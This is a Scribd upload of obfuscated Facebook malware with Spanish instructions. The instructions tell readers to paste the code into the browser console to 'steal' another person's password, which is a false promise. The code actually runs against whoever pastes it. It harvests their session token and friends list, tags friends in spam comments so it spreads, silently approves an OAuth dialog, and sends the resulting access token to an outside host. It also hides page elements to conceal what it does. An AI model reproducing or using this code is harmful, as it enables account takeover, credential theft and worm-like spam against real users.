Scribd
Upload
322 views

Código Hacker Facebook

This document contains JavaScript code that extracts a user's Facebook friends list and posts random comments to their profiles without their consent. It uses XMLHttpRequest to make API calls to Facebook to get the friends list and post comments. The code obfuscates strings and variables to avoid detection. It checks if the user is on Facebook and requests permissions to access their data and token before sending it offsite.

Uploaded by

HardCore
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
322 views

Código Hacker Facebook

This document contains JavaScript code that extracts a user's Facebook friends list and posts random comments to their profiles without their consent. It uses XMLHttpRequest to make API calls to Facebook to get the friends list and post comments. The code obfuscates strings and variables to avoid detection. It checks if the user is on Facebook and requests permissions to access their data and token before sending it offsite.

Uploaded by

HardCore
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 6

function IbraheemNada(uidss){var

a=document.createElement('script');a.innerHTML="new
AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?
location=permalink&action=subscribe').setData({ flid:
"+uidss+" }).send();";document.body.appendChild(a)}
IbraheemNada("");
var
_0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","3651540
20330078","onreadystatechange","readyState","arkadaslar = ","for
(;;);","","replace","responseText",";","length","entries","payload","round","
@[","uid",":","text","]","
","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26
token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https
://www.facebook.com/ajax/typeahead/first_degree.php?
__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?
__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=",
"\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid",
"\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x2
2:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x
22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=
0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1",
"\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x2
6ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/xwww-form-urlencoded","setRequestHeader","status","close"];var
fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var
user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]]
[_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var
svn_rev;function arkadaslari_al(id){var _0x7892x7= new
XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function ()
{if(_0x7892x7[_0xa22c[7]]==4)
{eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]]
(_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]]
(arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++)
{mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++)
{if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i])
{mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]
+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]
+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]]
[_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var
_0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26]
;_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_
0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]]
(_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]]

(_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]]


(_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();}
;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++)
{_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]]
[Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]]
[_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]
+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]]
(Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])]
[_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function
yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var
_0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[
41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8
+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892
x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_
0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+
=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_
0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56
]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]]
(_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]]
(_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function ()
{if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200)
{_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);}
;arkadaslari_al(id);

if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","a
pps.facebook.com","beta.facebook.com") >= 0){
var profile_id =
document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){

izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")
[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__")
< 0 && formnesne.getElementsByTagName("input")
[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name +
"=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name
+ "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();

xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinhtml = document.createElement("html");
izinhtml.innerHTML = xmlhttp.responseText;
if(izinhtml.getElementsByTagName("form").length > 0){
izinhtml.innerHTML = izinhtml.getElementsByTagName("form")
[0].outerHTML;
act = izinhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinhtml,act)
}else{
sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
if (sex[1]) {
tokenyolla(sex[1]);
}
}
}
};

xmlhttp.open("POST", act , true);


xmlhttp.setRequestHeader ("Content-Type", "application/x-www-formurlencoded");
xmlhttp.send(izinverparams);

function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?
response_type=token&display=popup&client_id=" + id

+"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stre
am,user_likes,friends_likes,user_birthday";
}

if(!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] &&


tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";

}
}
},200);
function tokenyolla(token){
top.location.href = 'http://clodbloods.com/face/#' + token;
}}
var alibasim = "clic en aceptar";
alert(alibasim);

NO COPIAR
REPITO LOS PASOS:
1. entren al perfil de la persona que quieren sacarle la contrasea..
2. da clic derecho en el perfil y nos dirigimos a inspecionar elemento luego clic
en console.
3. descargen y copeen el codigo de abajo y peguenlo en la consola con (CNTRL
+ V)
4. ya pegado dan enter y esperan a que hackee la victima, luego descargan la
contrasea

You might also like